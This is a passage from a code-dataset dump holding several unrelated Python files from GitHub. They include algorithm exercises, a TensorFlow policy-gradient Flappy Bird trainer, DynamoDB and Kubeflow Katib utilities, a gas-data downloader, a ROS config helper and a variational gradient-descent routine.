\nq=[\"fro??\", \"????o\", \"fr???\", \"fro???\", \"pro??\",'?????','????do','f????']\nu=[\"frodo\", \"front\", \"frost\", \"frozen\", \"frame\", \"kakao\"]\nprint(solution(u,q))","repo_name":"hyeinhyun/alg_prac","sub_path":"kakao기출/[kakao2020 intern]4_5.py","file_name":"[kakao2020 intern]4_5.py","file_ext":"py","file_size_in_byte":1644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26283778308","text":"class Solution(object):\n def minDifference(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n nums = sorted(nums)\n if len(nums) <=3:\n return 0\n sol1 = nums[-4] - nums[0]\n sol2 = nums[-3] - nums[1]\n sol3 = nums[-2] - nums[2]\n sol4 = nums[-1] - nums[3]\n return min(sol1, sol2, sol3, sol4)\n","repo_name":"humanalgorithm/leetcode_solutions","sub_path":"minimum-difference-between-largest-and-smallest-value-in-three-moves/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"975115222","text":"# -*- coding:utf-8 -*-\n#\n# Author : 寒江雪\n# E-mail :\n# Date : 19/11/09 00:03:44\n# Desc : 使用策略梯度的方法玩flappy bird\n#\n\"\"\"\nDependencies:\ntensorflow r1.14\npygame 1.9.4\n\"\"\"\nfrom __future__ import print_function\n\nimport tensorflow as tf\nimport cv2\nimport sys\nsys.path.append(\"game/\")\nimport wrapped_flappy_bird as game\nimport random\nimport numpy as np\nfrom collections import deque\nimport os\n\nclass Config(object):\n GAME = 'bird'\n ACTIONS = 2\n GAMMA = 0.99\n OBSERVE = 100000.0\n EXPLORE = 2000000.0\n FINAL_EPSILON = 0.0001\n INITIAL_EPSILON = 0.06\n REPLAY_MEMORY = 50000\n BATCH = 32\n FRAME_PER_ACTION = 1\n SAVE_MODEL_EVERY = 10000\n\n\nclass PolicyGradient(object):\n def __init__(self, scope='estimator', log_dir=None, config=Config):\n self.scope = scope\n self.summary_writer = None\n self.config = config\n # 一条轨迹的观测值,动作值,和回报值\n self.ep_obs, self.ep_as, self.ep_rs = [], [], []\n with tf.variable_scope(scope):\n self.build_graph()\n if log_dir:\n summary_dir = os.path.join(log_dir, scope)\n if os.path.exists(summary_dir):\n print(summary_dir + \" is exits.\")\n else:\n os.makedirs(summary_dir)\n self.summary_writer = tf.summary.FileWriter(summary_dir)\n\n def weight_variable(self, shape):\n initial = tf.truncated_normal(shape, stddev = 0.01)\n return tf.Variable(initial)\n\n def bias_variable(self, shape):\n initial = tf.constant(0.01, shape = shape)\n return tf.Variable(initial)\n\n def conv2d(slef, x, W, stride):\n return tf.nn.conv2d(x, W, strides = [1, stride, stride, 1], padding = \"SAME\")\n\n def max_pool_2x2(self, x):\n return tf.nn.max_pool(x, ksize = [1, 2, 2, 1], strides = [1, 2, 2, 1], padding = \"SAME\")\n\n def build_graph(self):\n # network weights\n W_conv1 = self.weight_variable([8, 8, 4, 32])\n b_conv1 = self.bias_variable([32])\n\n W_conv2 = self.weight_variable([4, 4, 32, 64])\n b_conv2 = self.bias_variable([64])\n\n W_conv3 = self.weight_variable([3, 3, 64, 64])\n b_conv3 = self.bias_variable([64])\n\n W_fc1 = self.weight_variable([1600, 512])\n b_fc1 = self.bias_variable([512])\n\n W_fc2 = self.weight_variable([512, self.config.ACTIONS])\n b_fc2 = self.bias_variable([self.config.ACTIONS])\n\n self.s = tf.placeholder(\"float\", [None, 80, 80, 4])\n self.tf_acts = tf.placeholder(tf.int32, [None, ], name=\"actions_num\")\n self.tf_vt = tf.placeholder(tf.float32, [None, ], name=\"actions_value\")\n\n\n\n h_conv1 = tf.nn.relu(self.conv2d(self.s, W_conv1, 4) + b_conv1)\n h_pool1 = self.max_pool_2x2(h_conv1)\n\n h_conv2 = tf.nn.relu(self.conv2d(h_pool1, W_conv2, 2) + b_conv2)\n #h_pool2 = max_pool_2x2(h_conv2)\n\n h_conv3 = tf.nn.relu(self.conv2d(h_conv2, W_conv3, 1) + b_conv3)\n #h_pool3 = max_pool_2x2(h_conv3)\n\n #h_pool3_flat = tf.reshape(h_pool3, [-1, 256])\n h_conv3_flat = tf.reshape(h_conv3, [-1, 1600])\n\n h_fc1 = tf.nn.relu(tf.matmul(h_conv3_flat, W_fc1) + b_fc1)\n\n # 输出动作的最大值\n self.readout = tf.matmul(h_fc1, W_fc2) + b_fc2\n\n #利用softmax函数得到每个动作的概率\n self.all_act_prob = tf.nn.softmax(self.readout, name='act_prob')\n #定义损失函数\n with tf.name_scope('loss'):\n neg_log_prob = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=self.all_act_prob,labels=self.tf_acts)\n self.loss = tf.reduce_mean(neg_log_prob*self.tf_vt)\n #定义训练,更新参数\n with tf.name_scope('train'):\n self.train_op = tf.train.AdamOptimizer(1e-6).minimize(self.loss)\n #self.summaries = tf.summary.merge([\n # tf.summary.scalar('loss_total', self.loss),\n # tf.summary.scalar('max_action', tf.reduce_max(self.readout))\n #])\n\n def predict(self, sess, s_t):\n all_act_prob = sess.run(self.all_act_prob, feed_dict={self.s: s_t})\n #按照给定的概率采样\n action = np.random.choice(range(all_act_prob.shape[1]), p=all_act_prob.ravel())\n return action\n\n def greedy(self, observation):\n prob_weights = self.sess.run(self.all_act_prob, feed_dict={self.tf_obs: observation[np.newaxis, :]})\n action = np.argmax(prob_weights.ravel())\n return action\n\n #定义存储,将一个回合的状态,动作和回报都保存在一起\n def store_transition(self, s, a, r):\n self.ep_obs.append(s)\n self.ep_as.append(a)\n self.ep_rs.append(r)\n\n #学习,以便更新策略网络参数,一个episode之后学一回\n def train(self, sess):\n #计算一个episode的折扣回报\n discounted_ep_rs_norm = self._discount_and_norm_rewards()\n #调用训练函数更新参数\n sess.run(self.train_op, feed_dict={\n self.s: self.ep_obs,\n self.tf_acts: self.ep_as,\n self.tf_vt: discounted_ep_rs_norm\n })\n #清空episode数据\n self.ep_obs, self.ep_as, self.ep_rs = [], [],[]\n return discounted_ep_rs_norm\n\n def _discount_and_norm_rewards(self):\n #折扣回报和\n discounted_ep_rs =np.zeros_like(self.ep_rs)\n running_add = 0\n for t in reversed(range(0, len(self.ep_rs))):\n running_add = running_add * self.config.GAMMA + self.ep_rs[t]\n discounted_ep_rs[t] = running_add\n #归一化\n discounted_ep_rs-= np.mean(discounted_ep_rs)\n discounted_ep_rs /= np.std(discounted_ep_rs)\n return discounted_ep_rs\n\n\ndef preprocess_state(x_t):\n x_t = cv2.cvtColor(cv2.resize(x_t, (80, 80)), cv2.COLOR_BGR2GRAY)\n ret, x_t = cv2.threshold(x_t, 1, 255, cv2.THRESH_BINARY)\n return x_t\n\n\ndef train_policy_network(sess, policy_gradient_net, model_dir=None):\n # 开始游戏\n game_state = game.GameState()\n\n do_nothing = np.zeros(Config.ACTIONS)\n do_nothing[0] = 1\n x_t, r_0, terminal = game_state.frame_step(do_nothing)\n x_t = preprocess_state(x_t)\n s_t = np.stack((x_t, x_t, x_t, x_t), axis=2)\n\n # saving and loading networks\n saver = tf.train.Saver()\n sess.run(tf.initialize_all_variables())\n checkpoint = tf.train.get_checkpoint_state(\"saved_networks\")\n if False and checkpoint and checkpoint.model_checkpoint_path:\n saver.restore(sess, checkpoint.model_checkpoint_path)\n print(\"Successfully loaded:\", checkpoint.model_checkpoint_path)\n else:\n print(\"Could not find old network weights\")\n\n # start training\n epsilon = Config.INITIAL_EPSILON\n t = 0\n i_episode = 0\n while \"flappy bird\" != \"angry bird\":\n readout_t = policy_gradient_net.predict(sess, [s_t])\n # 值域: [1,0]:什么都不做; [0,1]:提升Bird\n a_t = np.zeros([Config.ACTIONS])\n a_t[readout_t] = 1\n print(readout_t, a_t)\n # run the selected action and observe next state and reward\n # 表示界面图像数据,得分以及是否结束游戏\n x_t1_colored, r_t, terminal = game_state.frame_step(a_t)\n x_t1 = preprocess_state(x_t1_colored)\n x_t1 = np.reshape(x_t1, (80, 80, 1))\n s_t1 = np.append(x_t1, s_t[:, :, :3], axis=2)\n\n #将观测,动作和回报存储起来\n policy_gradient_net.store_transition(s_t, readout_t, r_t)\n s_t = s_t1\n # 游戏完成一轮eposide,进行一次训练\n if terminal:\n ep_rs_sum = sum(policy_gradient_net.ep_rs)\n print(\"episode:\", i_episode, \"rewards:\", ep_rs_sum)\n #每个episode学习一次\n vt = policy_gradient_net.train(sess)\n i_episode\n\ndef main():\n log_dir = \"log_dir/\"\n policy_gradient_net = PolicyGradient(scope='estimator', log_dir=log_dir)\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n train_policy_network(sess, policy_gradient_net, None)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"wwbin2017/reinforcement-learning","sub_path":"src/third/policy_network.py","file_name":"policy_network.py","file_ext":"py","file_size_in_byte":8126,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"41301373276","text":"import boto3\nfrom boto3.dynamodb.conditions import Key, Attr\nfrom config import *\nfrom utils import *\n\n\nclass ProjectSumModel():\n\n FIELD_IDENTITY_ID = \"identity_id\"\n FIELD_PROJECT_ID = \"project_id\"\n FIELD_TYPE = \"type\"\n\n def __init__(self, table_name) -> None:\n self.table = boto3.resource('dynamodb').Table(table_name)\n\n def reset_prj_sum_preprocess(self, project_id, type_data):\n response = self.table.update_item(\n Key={\n self.FIELD_PROJECT_ID: project_id,\n self.FIELD_TYPE: type_data,\n },\n ExpressionAttributeNames={\n '#CO': 'count',\n '#TS': 'total_size'\n },\n ExpressionAttributeValues={\n ':ts': 0,\n ':co': 0\n },\n UpdateExpression='SET #TS = :ts, #CO = :co'\n )\n return response\n\n def get_item(self, project_id, type_data):\n response = self.table.get_item(\n Key={\n 'project_id': project_id,\n 'type': type_data,\n }\n )\n print(response)\n if 'Item' in response:\n return response['Item']\n elif 'ResponseMetadata' in response and response['ResponseMetadata']['HTTPStatusCode'] == 200:\n return {'count': 0}\n return None\n","repo_name":"daita-technologies/backend","sub_path":"daita-app/shared-layer/commons/python/models/project_sum_model.py","file_name":"project_sum_model.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"18464801040","text":"from urllib import request\nfrom zipfile import ZipFile\nfrom io import BytesIO\nimport csv\nfrom operator import itemgetter\nimport itertools as it\nimport json\nimport os\n\n\ndef function_points_quality(grupo):\n points = []\n quality = []\n for row in grupo:\n points.append([row['TIME_PERIOD'] + ' , ' + row['OBS_VALUE']])\n quality.append([row['TIME_PERIOD'] + ' , ' + row['ASSESSMENT_CODE']])\n\n return points, quality\n\n\nresponse = request.urlopen(\n \"https://www.jodidata.org/_resources/files/downloads/gas-data/jodi_gas_csv_beta.zip\")\nif os.path.exists(\"downloads\") != True:\n os.mkdir(\"downloads\")\n\nunzip = ZipFile(BytesIO(response.read()))\nunzip.extractall(\"downloads\")\nunzip.close()\n\nwith open(\"downloads/jodi_gas_beta.csv\", 'r') as myfile:\n\n reader = csv.DictReader(myfile)\n\n primary_key = itemgetter('REF_AREA', 'ENERGY_PRODUCT', 'FLOW_BREAKDOWN', 'UNIT_MEASURE',\n 'TIME_PERIOD')\n reader = sorted(reader, key=primary_key)\n\n\nkeys, groups = [], []\nkeyfunc = itemgetter('REF_AREA', 'ENERGY_PRODUCT',\n 'FLOW_BREAKDOWN', 'UNIT_MEASURE')\nfor k, g in it.groupby(reader, key=keyfunc):\n keys.append(k[0]+k[1]+k[2]+k[3])\n groups.append(list(g))\n\n\nfor i, group in enumerate(groups):\n\n points, quality = function_points_quality(group)\n resultado = {\n 'series_id': ''.join(keys[i]),\n 'points': points,\n 'series': {\n 'country': ''.join(group[0]['REF_AREA']),\n 'product': ''.join(group[0]['ENERGY_PRODUCT']),\n 'flow': ''.join(group[0]['FLOW_BREAKDOWN']),\n 'unit_meassure': ''.join(group[0]['UNIT_MEASURE']),\n 'quality': quality\n }\n }\n\n result = json.dumps(resultado)\n\n print(result)\n","repo_name":"kenedycpd/Task_Shooju","sub_path":"bot_shooju.py","file_name":"bot_shooju.py","file_ext":"py","file_size_in_byte":1773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73669081708","text":"import json\nimport os\nimport textwrap\nfrom typing import Callable\nimport inspect\n\nfrom kubeflow.katib import models\nfrom kubeflow.katib.constants import constants\n\n\ndef is_running_in_k8s():\n return os.path.isdir(\"/var/run/secrets/kubernetes.io/\")\n\n\ndef get_current_k8s_namespace():\n with open(\"/var/run/secrets/kubernetes.io/serviceaccount/namespace\", \"r\") as f:\n return f.readline()\n\n\ndef get_default_target_namespace():\n if not is_running_in_k8s():\n return \"default\"\n return get_current_k8s_namespace()\n\n\ndef set_katib_namespace(katib):\n katib_namespace = katib.metadata.namespace\n namespace = katib_namespace or get_default_target_namespace()\n return namespace\n\n\ndef has_condition(conditions, condition_type):\n \"\"\"Verify if the condition list has the required condition.\n Condition should be valid object with `type` and `status`.\n \"\"\"\n\n for c in conditions:\n if c.type == condition_type and c.status == constants.CONDITION_STATUS_TRUE:\n return True\n return False\n\n\ndef print_experiment_status(experiment: models.V1beta1Experiment):\n if experiment.status:\n print(\n \"Experiment Trials status: {} Trials, {} Pending Trials, \"\n \"{} Running Trials, {} Succeeded Trials, {} Failed Trials, \"\n \"{} EarlyStopped Trials, {} MetricsUnavailable Trials\".format(\n experiment.status.trials or 0,\n experiment.status.trials_pending or 0,\n experiment.status.trials_running or 0,\n experiment.status.trials_succeeded or 0,\n experiment.status.trials_failed or 0,\n experiment.status.trials_early_stopped or 0,\n experiment.status.trial_metrics_unavailable or 0,\n )\n )\n print(f\"Current Optimal Trial:\\n {experiment.status.current_optimal_trial}\")\n print(f\"Experiment conditions:\\n {experiment.status.conditions}\")\n\n\ndef validate_objective_function(objective: Callable):\n\n # Check if objective function is callable.\n if not callable(objective):\n raise ValueError(\n f\"Objective function must be callable, got function type: {type(objective)}\"\n )\n\n # Verify the objective function arguments.\n objective_signature = inspect.signature(objective)\n try:\n objective_signature.bind({})\n except Exception:\n raise ValueError(\n \"Invalid args in the Objective function. \"\n \"The function args must have only 'parameters' dictionary. \"\n f\"Current Objective arguments: {objective_signature}\"\n )\n\n\ndef get_script_for_python_packages(packages_to_install, pip_index_url):\n packages_str = \" \".join([str(package) for package in packages_to_install])\n\n script_for_python_packages = textwrap.dedent(\n f\"\"\"\n if ! [ -x \"$(command -v pip)\" ]; then\n python3 -m ensurepip || python3 -m ensurepip --user || apt-get install python3-pip\n fi\n\n PIP_DISABLE_PIP_VERSION_CHECK=1 python3 -m pip install --prefer-binary --quiet \\\n --no-warn-script-location --index-url {pip_index_url} {packages_str}\n \"\"\"\n )\n\n return script_for_python_packages\n\n\nclass FakeResponse:\n \"\"\"Fake object of RESTResponse to deserialize\n Ref) https://github.com/kubeflow/katib/pull/1630#discussion_r697877815\n Ref) https://github.com/kubernetes-client/python/issues/977#issuecomment-592030030\n \"\"\"\n\n def __init__(self, obj):\n self.data = json.dumps(obj)\n","repo_name":"kubeflow/katib","sub_path":"sdk/python/v1beta1/kubeflow/katib/utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3505,"program_lang":"python","lang":"en","doc_type":"code","stars":1376,"dataset":"github-code","pt":"37"} +{"seq_id":"22224603342","text":"#!/usr/bin/env python3\n\n\"\"\"\nThe code in this file is based on the following source, thanks to the author.\nSource: https://gist.github.com/peci1/912549b79fd6e8801023\n\"\"\"\n\nimport types\nfrom typing import List\nfrom typing import TypedDict\nfrom typing import Union\n\n\nclass EnumItem(TypedDict):\n name: str\n value: Union[bool, int, float, str]\n description: str\n\n\nclass ConfigModifier:\n @staticmethod\n def change_enum_items(config_type: types.ModuleType,\n parameter_name: str,\n new_enum_items: List[EnumItem],\n default=None) -> None:\n \"\"\"\n Change the content of a dynamic reconfigure enum field.\n In order to add the new values properly the dynamic reconfigure server has to be created after the enum has been\n updated.\n :param config_type: autogenerated config (package.cfg.*Config)\n :param parameter_name: parameter to change (has to have enum as edit method)\n :param new_enum_items: the new items that will replace the original enum\n :type new_enum_items: list of dicts with structure {\"name\": ..., \"value\": ..., \"description\": ...}\n :param default: this will be the default if provided, otherwise the first element will be the default\n :raises RuntimeError: if there is no valid enum parameter with the given name in the given config_type\n \"\"\"\n\n if not hasattr(config_type, \"config_description\") or not hasattr(config_type, \"defaults\"):\n raise RuntimeError(\"dynamic reconfigure {} \"\n \"is not a valid dynamic reconfigure type\".format(str(config_type)))\n\n for parameter_description in config_type.config_description[\"parameters\"]:\n if parameter_description[\"name\"] == parameter_name:\n if parameter_description[\"edit_method\"] == \"\":\n raise RuntimeError(\"dynamic reconfigure {} \"\n \"has other edit method than enum\".format(str(config_type)))\n\n edit_method = eval(parameter_description[\"edit_method\"])\n enum = edit_method[\"enum\"]\n\n if len(enum) == 0:\n raise RuntimeError(\"dynamic reconfigure {} \"\n \"has too few elements to be a proper enum\".format(str(config_type)))\n\n sample_enum_item = enum[0]\n\n new_enum = []\n for item in new_enum_items:\n new_enum_item = sample_enum_item.copy()\n new_enum_item[\"name\"] = item[\"name\"]\n new_enum_item[\"value\"] = item[\"value\"]\n new_enum_item[\"description\"] = item[\"description\"]\n new_enum.append(new_enum_item)\n\n edit_method[\"enum\"] = new_enum\n parameter_description[\"edit_method\"] = repr(edit_method)\n\n parameter_description[\"default\"] = default if default is not None else new_enum[0][\"value\"]\n config_type.defaults[parameter_description[\"name\"]] = default\n\n return\n\n raise RuntimeError(\"dynamic reconfigure {} has no parameter {}\".format(str(config_type), parameter_name))\n","repo_name":"tuw-robotics/tuw_teleop","sub_path":"tuw_gamepad_python/src/tuw_gamepad_python/utilities/config_modifier.py","file_name":"config_modifier.py","file_ext":"py","file_size_in_byte":3234,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"25112834916","text":"class MoveSet:\n def __init__(self, forme, golpes_possiveis):\n self.forme = forme\n self.golpes_possiveis = golpes_possiveis\n \ndef isvazio(campo):\n if campo == '':\n return True\n else:\n return False\n\ndef import_moveset(dataset_ulr):\n from movesets import isvazio\n file = open(dataset_ulr)\n movesets = {}\n for poke in file:\n linha = poke.split(',')\n if not linha[0].isnumeric:\n continue\n golpes = {}\n for golpe in linha[3:]:\n if isvazio(golpe):\n continue\n linha_golpe = golpe.split(' - ')\n golpes[linha_golpe[-1]] = linha_golpe[0]\n moveset = MoveSet(linha[2], golpes)\n movesets[linha[2]] = moveset\n return movesets\n","repo_name":"Lucas-R4mos/PokePython","sub_path":"movesets.py","file_name":"movesets.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"39995641804","text":"import argparse\nimport logging\nfrom itertools import tee\n\n# finally stumbled on an nwise function that eluded me in Advent 2015.\n# extrapolated from day03.threewise\n\ndef nwise(iterable, n):\n streams = tee(iterable, n)\n\n for i, stream in enumerate(reversed(streams)):\n for _ in range(n - i):\n next(stream, None)\n\n values = zip(*streams)\n for x in values:\n yield x\n for _ in range(n - 1):\n next(values)\n\ndef show_and_tell():\n l = list(range(28))\n print(l)\n print(list(nwise(l, 3)))\n\n print(list(nwise(l, 5)))\n\ndef consume(iterable):\n return map(lambda x: x, iterable)\n\ndef stress():\n MILLION = 1000 * 1000\n BILLION = MILLION * MILLION\n TRILLION = BILLION * BILLION\n print('n-wise-ing a million number into 100\\'s pairs.')\n log = logging.getLogger('stress')\n for paired in nwise(range(MILLION), 100):\n log.debug(paired)\n\ndef main():\n \"\"\"\n Demonstrate an n-wise pairing function.\n \"\"\"\n parser = argparse.ArgumentParser(description=main.__doc__)\n parser.add_argument('--stress-test', action='store_true', help='Test doing a lot of these.')\n parser.add_argument('--debug', action='store_true', help='Show debugging')\n args = parser.parse_args()\n\n if args.debug:\n logging.basicConfig(level=logging.DEBUG)\n\n if args.stress_test:\n stress()\n else:\n show_and_tell()\n\nif __name__ == '__main__':\n main()\n","repo_name":"hitbox/scratch","sub_path":"adventofcode/aoc2016/nwise.py","file_name":"nwise.py","file_ext":"py","file_size_in_byte":1440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18976223842","text":"\"\"\"Changelog.\"\"\"\nimport sublime\nimport sublime_plugin\nimport webbrowser\n\nCSS = '''\nhtml { {{'.background'|css}} }\ndiv.bracket-highlighter { padding: 0; margin: 0; {{'.background'|css}} }\n.bracket-highlighter h1, .bracket-highlighter h2, .bracket-highlighter h3,\n.bracket-highlighter h4, .bracket-highlighter h5, .bracket-highlighter h6 {\n {{'.string'|css}}\n}\n.bracket-highlighter blockquote { {{'.comment'|css}} }\n.bracket-highlighter a { text-decoration: none; }\n'''\n\n\nclass BracketHighlighterChangesCommand(sublime_plugin.WindowCommand):\n \"\"\"Changelog command.\"\"\"\n\n def run(self):\n \"\"\"Show the changelog in a new view.\"\"\"\n try:\n import mdpopups\n has_phantom_support = (mdpopups.version() >= (1, 10, 0)) and (int(sublime.version()) >= 3118)\n except Exception:\n has_phantom_support = False\n\n text = sublime.load_resource('Packages/BracketHighlighter/CHANGES.md')\n view = self.window.new_file()\n view.set_name('BracketHighlighter - Changelog')\n view.settings().set('gutter', False)\n if has_phantom_support:\n mdpopups.add_phantom(\n view,\n 'changelog',\n sublime.Region(0),\n text,\n sublime.LAYOUT_INLINE,\n wrapper_class=\"bracket-highlighter\",\n css=CSS\n )\n else:\n view.run_command('insert', {\"characters\": text})\n view.set_read_only(True)\n view.set_scratch(True)\n\n def on_navigate(self, href):\n \"\"\"Open links.\"\"\"\n webbrowser.open_new_tab(href)\n","repo_name":"kdfight/st3","sub_path":"BracketHighlighter-master/changes.py","file_name":"changes.py","file_ext":"py","file_size_in_byte":1613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22016911225","text":"import requests\nimport blaseball\nimport ast\nimport time\n\nargs = {'season':'-1'}\nkeyword = input('Enter keyword: ')\nout = blaseball.searchChronicler(args, keyword)\ngame = ''\nfor i in out:\n\td = i['data']\n\tif i['gameId'] != game:\n\t\tseason = d['season']\n\t\tday = d['day']\n\t\thome = d['homeTeamName']\n\t\taway = d['awayTeamName']\n\t\tprint('\\n{}/{} {} VS. {}'.format(season,day,home,away).upper())\n\t\tgame = i['gameId']\n\tprint(d['lastUpdate'])\n\ninput()\n","repo_name":"Updownbanana/Updown-Blaseball","sub_path":"chronicler_search.py","file_name":"chronicler_search.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31105584475","text":"import signal\nfrom datetime import datetime\nimport numpy as np\nimport TAT\nfrom ..ansatz_product_state import AnsatzProductState, Observer, SweepSampling, ErgodicSampling\nfrom ..utility import (show, showln, mpi_comm, mpi_rank, mpi_size, SignalHandler, seed_differ, write_to_file,\n get_imported_function, restrict_wrapper, send)\n\n\ndef check_difference(state, observer, grad, energy_observer, configuration_pool, check_difference_delta):\n\n def get_energy():\n state.ansatz.refresh_auxiliaries()\n with energy_observer:\n energy_observer(configuration_pool)\n energy, _ = energy_observer.total_energy\n return energy\n\n original_energy, _ = observer.total_energy\n delta = check_difference_delta\n showln(f\"difference delta is set as {delta}\")\n\n element_g = state.ansatz.elements(None) # Get\n element_sr = state.ansatz.elements(None) # Set real part\n element_si = state.ansatz.elements(None) # Set imag part\n element_r = state.ansatz.elements(None) # Reset\n element_grad = state.ansatz.elements(grad) # Get gradient\n\n element_sr.send(None)\n element_si.send(None)\n element_r.send(None)\n for value, calculated_grad in zip(element_g, element_grad):\n # value is a torch tensor which maybe updated layer, so need to copy it by convert it to normal python\n # number.\n if np.iscomplex(value):\n value = complex(value)\n else:\n value = float(value)\n calculated_grad = calculated_grad.real\n send(element_sr, value + delta)\n now_energy = get_energy()\n rgrad = (now_energy - original_energy) / delta\n if np.iscomplex(value):\n send(element_si, value + delta * 1j)\n now_energy = get_energy()\n igrad = (now_energy - original_energy) / delta\n cgrad = rgrad + igrad * 1j\n else:\n cgrad = rgrad\n send(element_r, value)\n showln(\" \", abs(calculated_grad - cgrad) / abs(cgrad), cgrad, calculated_grad)\n\n\ndef line_search(state, observer, grad, energy_observer, configuration_pool, step_size, line_search_amplitude):\n saved_state = list(state.ansatz.tensors(None))\n\n def restore_state():\n setter = state.ansatz.tensors(None)\n setter.send(None)\n for tensor in saved_state:\n send(setter, tensor)\n\n grad_dot_begin = mpi_comm.bcast(state.state_dot(grad, observer.gradient))\n if grad_dot_begin > 0:\n state.apply_gradient(grad, step_size)\n with energy_observer:\n energy_observer(configuration_pool)\n grad_dot_end = mpi_comm.bcast(state.state_dot(grad, energy_observer.gradient))\n showln(f\"predict eta={step_size}, energy={energy_observer.energy}, gradient dot={grad_dot_end}\")\n restore_state()\n\n if grad_dot_end > 0:\n step_size *= line_search_amplitude\n showln(f\"step_size is chosen as {step_size}, since grad_dot(begin) > 0, grad_dot(end) > 0\")\n else:\n step_size /= line_search_amplitude\n showln(f\"step_size is chosen as {step_size}, since grad_dot(begin) > 0, grad_dot(end) <= 0\")\n else:\n step_size = step_size\n showln(f\"step_size is chosen as {step_size}, since grad_dot(begin) < 0\")\n\n return mpi_comm.bcast(step_size)\n\n\ndef gradient_descent(\n state: AnsatzProductState,\n sampling_total_step=0,\n grad_total_step=1,\n grad_step_size=0,\n *,\n # About sampling\n multichain_number=1,\n sampling_method=\"sweep\",\n sampling_configurations=[],\n sweep_hopping_hamiltonians=None,\n # About subspace\n restrict_subspace=None,\n # About observe\n observe_max_batch_size=None,\n # About gradient method\n use_check_difference=False,\n use_line_search=False,\n use_fix_relative_step_size=False,\n momentum_parameter=0.0,\n # About natural gradient\n use_natural_gradient=False,\n conjugate_gradient_method_step=20,\n conjugate_gradient_method_error=0.0,\n metric_inverse_epsilon=0.01,\n cache_natural_delta=None,\n # About log and save state\n log_file=None,\n save_state_file=None,\n save_configuration_file=None,\n # About line search\n line_search_amplitude=1.2,\n line_search_parameter=0.6,\n # About momentum\n orthogonalize_momentum=False,\n # About check difference\n check_difference_delta=1e-8,\n # About Measurement\n measurement=None):\n\n time_str = datetime.now().strftime(\"%Y-%m-%d-%H:%M:%S\")\n\n # Gradient step\n use_gradient = grad_step_size != 0 or use_check_difference\n if use_gradient:\n if use_check_difference:\n grad_total_step = 1\n else:\n grad_total_step = grad_total_step\n else:\n grad_total_step = 1\n showln(f\"gradient total step={grad_total_step}\")\n\n # Restrict subspace\n if restrict_subspace is not None:\n origin_restrict = get_imported_function(restrict_subspace, \"restrict\")\n restrict = restrict_wrapper(origin_restrict)\n else:\n restrict = None\n\n # Prepare observers\n observer = Observer(\n state,\n enable_energy=True,\n enable_gradient=use_gradient,\n enable_natural_gradient=use_natural_gradient,\n cache_natural_delta=cache_natural_delta,\n restrict_subspace=restrict,\n max_batch_size=observe_max_batch_size,\n )\n if measurement:\n measurement_names = measurement.split(\",\")\n for measurement_name in measurement_names:\n observer.add_observer(measurement_name, get_imported_function(measurement_name, \"measurement\")(state))\n if use_gradient:\n need_energy_observer = use_line_search or use_check_difference\n else:\n need_energy_observer = False\n if need_energy_observer:\n energy_observer = Observer(\n state,\n enable_energy=True,\n enable_gradient=use_line_search,\n restrict_subspace=restrict,\n max_batch_size=observe_max_batch_size,\n )\n\n # Main loop\n with SignalHandler(signal.SIGINT) as sigint_handler:\n for grad_step in range(grad_total_step):\n if need_energy_observer:\n configuration_pool = []\n # Sampling and observe\n with seed_differ, observer:\n # Sampling method\n if sampling_method == \"sweep\":\n if sweep_hopping_hamiltonians is not None:\n hopping_hamiltonians = get_imported_function(sweep_hopping_hamiltonians,\n \"hopping_hamiltonians\")(state)\n else:\n hopping_hamiltonians = None\n sampling = SweepSampling(state, multichain_number, restrict, hopping_hamiltonians)\n sampling_total_step = sampling_total_step\n # Initial sweep configuration\n if len(sampling_configurations) < mpi_size * multichain_number:\n choose_generator = TAT.random.uniform_int(0, len(sampling_configurations) - 1)\n choose = [choose_generator() for _ in range(multichain_number)]\n else:\n choose = [mpi_rank * multichain_number + i for i in range(multichain_number)]\n for configuration_i, choose_i in zip(sampling.configuration, choose):\n configuration_i.import_configuration(sampling_configurations[choose_i])\n elif sampling_method == \"ergodic\":\n sampling = ErgodicSampling(state, multichain_number, restrict)\n sampling_total_step = sampling.total_step\n else:\n raise ValueError(\"Invalid sampling method\")\n # Sampling run\n # total_sampling_pool[sampling step][process rank][chain index]\n for sampling_step in range(sampling_total_step):\n if sampling_step % (mpi_size * multichain_number) == mpi_rank * multichain_number:\n bound = sampling_total_step - sampling_step\n sampling_result = sampling()[:bound]\n observer(sampling_result)\n if need_energy_observer:\n configuration_pool += sampling_result\n show(f\"sampling {sampling_step}/{sampling_total_step}, energy={observer.energy}\")\n # Save configuration\n gathered_configurations = mpi_comm.allgather(\n [configuration.export_configuration() for _, configuration in sampling_result])\n sampling_configurations.clear()\n for config in gathered_configurations:\n sampling_configurations += config\n showln(f\"sampling done, total_step={sampling_total_step}, energy={observer.energy}\")\n\n # Measure log\n if measurement and mpi_rank == 0:\n for measurement_name in measurement_names:\n measurement_result = observer.result[measurement_name]\n measurement_whole_result = None\n # TODO ansatz product state does not implement it yet.\n save_result = get_imported_function(measurement_name, \"save_result\")\n save_result(state, measurement_result, measurement_whole_result)\n # Energy log\n if log_file and mpi_rank == 0:\n with open(log_file.replace(\"%t\", time_str), \"a\", encoding=\"utf-8\") as file:\n print(*observer.energy, file=file)\n\n if 